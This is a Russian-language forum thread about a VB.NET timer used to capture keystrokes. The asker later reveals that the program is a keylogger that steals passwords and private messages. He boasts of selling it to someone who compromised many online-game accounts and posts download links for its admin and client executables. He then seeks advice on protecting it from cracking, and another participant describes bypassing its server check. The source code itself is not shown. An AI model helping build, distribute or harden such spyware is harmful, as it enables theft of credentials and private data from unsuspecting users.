|
таймер
|
|||
---|---|---|---|
#18+
имеется таймер с интервалом 1 (1 мск) с содержимым: Код: vbnet 1. 2. 3. 4. 5.
в нём выполняется код по получению нажатой клавиши. на моём компе всё норм. но у других юзеров комп не успевает сделать вышеописанные действия за одну мск. в итоге прога начинает ловить только, например, каждую третью нажатую клавишу. очевидное решение: убрать Код: vbnet 1.
вопрос: можно ли так сделать? ведь будет копиться всё больше и больше невыполнивших свою работу таймеров. или это не страшно? как ещё можно решить проблему? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 18:16 |
|
таймер
|
|||
---|---|---|---|
#18+
Реально таймер в лучшем случае срабатывает раз в 10 мс... брось на форму кнопку и пару таймеров, в модуль вот такой код: Код: vbnet 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16. 17. 18. 19. 20. 21. 22. 23. 24.
и подивись на результат. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 18:49 |
|
таймер
|
|||
---|---|---|---|
#18+
Да, оба таймеры выключены, период - у первого 1 мс, у второго 1000 мс. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 18:50 |
|
таймер
|
|||
---|---|---|---|
#18+
Akinaподивись на результат. 5 раз запустил - 5 раз выдало "64". т.е. одномилисекундный таймер отрабатывает только 64 раза за 1 секунду... коряво, но не очень понимаю, какая параллель с моей проблемой ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 19:07 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0какая параллель с моей проблемойсамая прямая. Не надо убирать отключение таймера. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 19:21 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProBelow0какая параллель с моей проблемойсамая прямая. Не надо убирать отключение таймера. ты мне это когда-то впервые посоветовал) ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 19:22 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.ProЧто - ЭТО? юзать выключения таймера в самом таймере. убрал выключение таймера. + вынес все обращения к хостингу в отдельный независимый медленный таймер. т.е. за счёт уменьшения интервала связи с нетом я уменьшил нагрузку на свой хост и увеличил скорость проги. в идеале до меня дошло, как правильно избежать многократного запуска таймера. например, так: Код: vbnet 1. 2. 3. 4. 5. 6. 7. 8.
тогда время выполнения кода не будет складываться с интервалом таймера. заманался вводить этот тупой код! ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:13 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0юзать выключения таймера в самом таймерену. а разве я сейчас что-то другое советую? то, что ты сейчас написал, бессмысленно (кроме случаев, когда в строке "выполняемый код" есть doevents) ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:24 |
|
таймер
|
|||
---|---|---|---|
#18+
Shocker.Proто, что ты сейчас написал, бессмысленно в коде выше если интервал таймера 5 секунд, а сам код в таймере выполняется 3 секунды, то следующее выполнение кода будет через 5+3=8 секунд. а в варианте, что я выложил, следующий запуск будет, как и задумано, через 5 секунд. моя прога работает идеально) уже не знаю, что ещё в неё такое пихнуть, чтоб прям поражала воображение. продал пока что только одному челу, и он при помощи неё уже переломал половину юзеров одной онлайн игрушки))) надо будет поставить помесячную оплату за пользование прогой. взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:34 |
|
таймер
|
|||
---|---|---|---|
#18+
Еще раз: событие следующего срабатывания таймера не начнется, пока выполняется код предыдущего события (за исключением DoEvens) так что проверять a = True смысла не имеет, а если твой код будет выполняться дольше, чем интервал таймера, события будут накапливаться в очереди и очередь будет расти бесконечно. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:44 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0, >взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) был же юзер, клялся треуголкой, что взломает, разбудите его ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:49 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофа, А мне напоминает анекдот по Неуловимого Джо ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 20:51 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0не очень понимаю, какая параллель с моей проблемой Да собсно я это к Below0комп не успевает сделать вышеописанные действия за одну мск ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 21:31 |
|
таймер
|
|||
---|---|---|---|
#18+
катастрофаBelow0, >взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) был же юзер, клялся треуголкой, что взломает, разбудите его Готов сломать! ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:07 |
|
таймер
|
|||
---|---|---|---|
#18+
Я тута!катастрофаBelow0, >взломать её невозможно(а то меня раньше беспокоил этот вопрос), за что большое спс PHP) был же юзер, клялся треуголкой, что взломает, разбудите его Готов сломать! скинь любую свою почту. по почте и по учётной записи компа идёт привязка к одному юзеру. за одно потестишь моё произведение искусства и гениальной инженерной мысли ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:21 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0Я тута!пропущено... Готов сломать! скинь любую свою почту. по почте и по учётной записи компа идёт привязка к одному юзеру. за одно потестишь моё произведение искусства и гениальной инженерной мысли Кому: uebanec@bk.ru ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:29 |
|
таймер
|
|||
---|---|---|---|
#18+
Я тута!Below0пропущено... скинь любую свою почту. по почте и по учётной записи компа идёт привязка к одному юзеру. за одно потестишь моё произведение искусства и гениальной инженерной мысли Кому: uebanec@bk.ru воть... http://qlewer.mgn-host.ru/Qlewer.exe в админской части отключена резервная админская отправка, чтоб зря не спамил с почты) в остальном всё работает. можешь взломать кого-нибудь из коллег. через пару часов или завтра отключу программу дистанцинно. файл с клевером на иконке - админская часть. её открываешь сам(привязка по учётной записи юзера. твою я не знаю, поэтому взломаешь сам - для тебя не проблема). а эту http://qlewer.mgn-host.ru/qlewer client.exe прогу отсылаешь кому-нибудь. 1 раз откроешь - перестанет работать, поэтому делай копии. отсылает логи на админускую часть и на твою почту после последних доработок не проверял, но должна работать и приносить радость) вот офиц сайт http://qlewer.mgn-host.ru/ ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:48 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0, Хорошо, завтра посмотрю это дерьмо. Обещаю. А как ты отключишь если я её буду тестить в сети без выхода в интернет? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:52 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯBelow0, Хорошо, завтра посмотрю это дерьмо. Обещаю. А как ты отключишь если я её буду тестить в сети без выхода в интернет? я отключу прогу от выхода в интернет) а так она будет работать. только какой смысл тебе будет от проги, тырящей пароли через интернет без интернета ? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:54 |
|
таймер
|
|||
---|---|---|---|
#18+
Below0, Так что мне надо сделать с твоей поделкой что бы она считалась взломанной? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 22:56 |
|
таймер
|
|||
---|---|---|---|
#18+
ЯBelow0, Так что мне надо сделать с твоей поделкой что бы она считалась взломанной? хм... взломать её в принципе невозможно. под "взломать" я подразумеваю один из пунктов 1) работа проги вне моего желания (т.е. прога перестаёт принадлежать мне) 2) отказ работы сервера или потеря данных или получение моих или чужих данных с хостинга или использование сервера в своих нуждах я защитил прогу от всего перечисленного(уж как мог). самой уязвимой остаётся админская часть(на то она и админская), т.е. можно заставить её работать без моего желания. но толку от неё без клиентской части9которую я могу заблокировать дистанционно) не будет ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 23:09 |
|
таймер
|
|||
---|---|---|---|
#18+
кстати, хочешь, расскажу, как взломать этот форум?(защитную картинку) я знаю как, но для этого надо убить целый день. дыра в защите форума устраняется в течении часа... т.е. на флуд будет только около миллиона сообщений) Shocker.Pro, или скажу, где брешь в защите, тебе за разбанивание моего аккаунта) ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 23:27 |
|
таймер
|
|||
---|---|---|---|
#18+
1) Что это означает? У нее есть лицензионное соглашение, где написано, кому она принадлежит? Нужно изменить текст, что бы там было написано, что она больше тебе не принадлежит? Чушь какая-то. Работает она в любом случае независимо от твоего желания. Это исполняемый файл, который исполняет операционка, причем тут твоя личность? 2) Это уже взлом сайта, а не проги. В любом случае можно дописать в файл hosts свой сайт под именем твоего, запросы и ответы посмотреть фиддлером и подделать их на своем сайте. Я не знаю, зачем она постоянно дергает сайт, но если лишь за тем, чтобы проверить, что работать ей дозволяется, то ломается она еще проще - отключением таймера. Или условного перехода, что по сути одно и тоже. ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 23:42 |
|
таймер
|
|||
---|---|---|---|
#18+
AntonariyРаботает она в любом случае независимо от твоего желания что ты понимаешь под "работает"? запускается? так по одному моему желанию она перестанет выполнять свои прямые обязанности, а именно: тырение паролей и переписок. AntonariyЭто исполняемый файл, который исполняет операционка, причем тут твоя личность? без моей личности это всего лишь бесполезный набор байтов AntonariyЯ не знаю, зачем она постоянно дергает сайт, но если лишь за тем, чтобы проверить, что работать ей дозволяется, то ломается она еще проще - отключением таймера. я наивен, но не настолько глуп) AntonariyВ любом случае можно дописать в файл hosts свой сайт под именем твоего, запросы и ответы посмотреть фиддлером и подделать их на своем сайте хм( да, это вполне осуществимо( и как от этого защититься? ... |
|||
:
Нравится:
Не нравится:
|
|||
14.06.2012, 23:56 |
|
|
start [/forum/topic.php?fid=60&fpage=75&tid=2157670]: |
0ms |
get settings: |